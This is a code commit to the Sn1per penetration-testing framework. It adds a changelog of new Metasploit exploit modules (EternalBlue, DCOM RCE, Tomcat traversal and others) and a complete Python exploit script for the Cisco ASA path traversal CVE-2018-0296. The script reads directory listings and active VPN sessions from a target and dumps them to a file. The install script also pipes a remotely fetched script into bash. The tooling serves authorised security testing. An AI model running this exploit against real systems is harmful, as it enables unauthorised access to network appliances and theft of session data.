Sn1per by 1N3@CrowdShield

1N3 · Jul 23, 2018 · 0e6a80b · 0e6a80b
1 parent 50ffb50
commit 0e6a80b
Show file tree

Hide file tree

Showing 10 changed files with 31,524 additions and 14,041 deletions.
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -1,4 +1,36 @@
 ## CHANGELOG:
+* v5.2 - Added SubOver subdomain takeover scanner
+* v5.2 - Added Subfinder subdomain enumeration tool
+* v5.2 - Added Amass subdomain enumeration tool
+* v5.2 - Added configurable modules/plugins to sniper script
+* v5.2 - Added MS17-010 SMB Etternal Blue MSF Exploit
+* v5.2 - Added MSF Postgresql login scanner
+* v5.2 - Added passive web spider
+* v5.2 - Added WebDav metasploit aux modules
+* v5.2 - Added NetBIOS NMap/MSF enumeration
+* v5.2 - Added SMB MSF enumeration
+* v5.2 - Added NSF MSF enumeration
+* v5.2 - Added SSH MSF enumeration
+* v5.2 - Added BadBlue Passthru MSF exploit
+* v5.2 - Added SMB GPP MSF aux module
+* v5.2 - Added Intel AMT MSF scanner
+* v5.2 - Added MySQL MSF scanner
+* v5.2 - Added MS03-026 DCOM RCE MSF exploit
+* v5.2 - Added VNC no auth MSF scanner
+* v5.2 - Added FTP MSF version scanner
+* v5.2 - Added FTP anonymous access MSF scanner
+* v5.2 - Added MS12-020 RDP MSF scanner
+* v5.2 - Added MS10-061 Spoolss MSF exploit
+* v5.2 - Added MS15-034 Sys Memory Dump MSF exploit
+* v5.2 - Added MS06-040 Netapi MSF exploit
+* v5.2 - Added MS05-039 PNP MSF exploit
+* v5.2 - Added MS12-020 Max Channels RDP scanner
+* v5.2 - Added JBoss status MSF scanner
+* v5.2 - Added Apache Struts 2 REST Plugin XStream RCE check
+* v5.2 - Added Apache Tomcat UTF8 Traversal MSF exploit
+* v5.2 - Added Apache OPTIONS Bleed MSF exploit
+* v5.2 - Added HP ILO Auth Bypass MSF exploit
+* v5.2 - Added Jooma Comfields SQL injection MSF exploit
 * v5.1 - Added dnscan to install.sh and updated sniper references which were broken
 * v5.1 - Changed default brute force list for dnscan to improve performance of scans
 * v5.1 - Removed CloudHunter and SubOver references (CC. 爱上平顶山)

diff --git a/bin/cisco-asa-traversal.py b/bin/cisco-asa-traversal.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python
+
+import requests
+import sys
+import urlparse
+import os
+
+print("""
+      _____ _____ _____ _____ _____    ___   _____  ___         
+     /  __ \_   _/  ___/  __ \  _  |  / _ \ /  ___|/ _ \        
+     | /  \/ | | \ `--.| /  \/ | | | / /_\ \\ `--./ /_\ \       
+     | |     | |  `--. \ |   | | | | |  _  | `--. \  _  |       
+     | \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |       
+      \____/\___/\____/ \____/\___/  \_| |_/\____/\_| |_/        
+                                                                
+______     _   _       _____                                  _ 
+| ___ \   | | | |     |_   _|                                | |
+| |_/ /_ _| |_| |__     | |_ __ __ ___   _____ _ __ ___  __ _| |
+|  __/ _` | __| '_ \    | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
+| | | (_| | |_| | | |   | | | | (_| |\ V /  __/ |  \__ \ (_| | |
+\_|  \__,_|\__|_| |_|   \_/_|  \__,_| \_/ \___|_|  |___/\__,_|_|
+                                                                
+                CVE-2018-0296
+  Script author: Yassine Aboukir(@yassineaboukir)
+    """)
+
+requests.packages.urllib3.disable_warnings()
+
+url = sys.argv[1]
+
+dir_path = os.path.dirname(os.path.realpath(__file__))
+filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
+CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
+active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
+logon = "/+CSCOE+/logon.html"
+
+try:
+  is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
+except requests.exceptions.RequestException as e:
+  print(e)
+  sys.exit(1)
+
+if "webvpnLang" in is_cisco_asa.cookies:
+    try:
+      filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
+      CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
+      active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
+
+    except requests.exceptions.RequestException as e:
+      print(e)
+      sys.exit(1)
+
+    if str(filelist_r.status_code) == "200":
+      with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
+        cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
+        print("Vulnerable! Check the text dump saved in {}".format(dir_path))
+    else: print("Not vulnerable!")
+else: 
+  print("This is not Cisco ASA! E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
+  sys.exit(1)
+
diff --git a/bin/report.py b/bin/report.py
@@ -0,0 +1,2 @@
+import pdfkit
+pdfkit.from_url('/usr/share/sniper/loot/workspace/hulu/sniper-report.html', 'out.pdf')
diff --git a/install.sh b/install.sh
@@ -15,7 +15,7 @@ echo -e "$OKRED  (__  ) / / // // /_/ /  __/ /    $RESET"
 echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/     $RESET"
 echo -e "$OKRED               /_/                 $RESET"
 echo -e "$RESET"
-echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
+echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
 echo ""
 
 INSTALL_DIR=/usr/share/sniper
@@ -37,7 +37,7 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
 cd $INSTALL_DIR
 
 echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
-apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap
+apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq
 apt-get install waffit 2> /dev/null
 pip install dnspython colorama tldextract urllib3 ipaddress requests
 curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
@@ -78,6 +78,10 @@ pip install -r $PLUGINS_DIR/dnscan/requirements.txt
 mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
 unzip slurp.zip
 rm -f slurp.zip
+cd ~/go/bin/;go get github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
+cd ~/go/bin;go get -u github.com/caffix/amass;mv amass /usr/local/bin/
+cd ~/go/bin;go get github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
+cd $PLUGINS_DIR
 wget https://github.com/michenriksen/aquatone/blob/master/subdomains.lst -O /usr/share/sniper/plugins/Sublist3r/subdomains.lst
 wget https://raw.githubusercontent.com/1N3/IntruderPayloads/master/FuzzLists/dirbuster-quick.txt -O /usr/share/sniper/plugins/cansina/dirbuster-quick.txt
 wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse